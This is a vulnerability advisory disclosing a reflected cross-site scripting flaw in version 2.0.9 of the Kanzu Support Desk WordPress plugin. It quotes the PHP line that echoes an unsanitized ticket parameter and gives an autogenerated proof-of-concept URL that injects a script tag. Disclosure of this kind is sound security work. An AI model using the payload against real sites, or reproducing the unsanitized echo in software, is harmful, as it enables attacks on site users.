Advisory #: 56
Title: Reflected XSS in wordpress plugin kanzu-support-desk v2.0.9
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/kanzu-support-desk
Downloads: 2213
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: kanzu-support-desk
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./kanzu-support-desk/includes/admin/views/html-admin-single-ticket.php: 65: <input name="tkt_id" type="hidden" value="<?php echo $_GET['ksd_ticket'];?>" /> The variable ksd_ticket appears to send unsanitized data back to the users browser.
CVE-ID: Not Released
File:./kanzu-support-desk/includes/admin/views/html-admin-single-ticket.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/kanzu-support-desk/includes/admin/views/html-admin-single-ticket.php?ksd_ticket="><script>alert(1);</script><"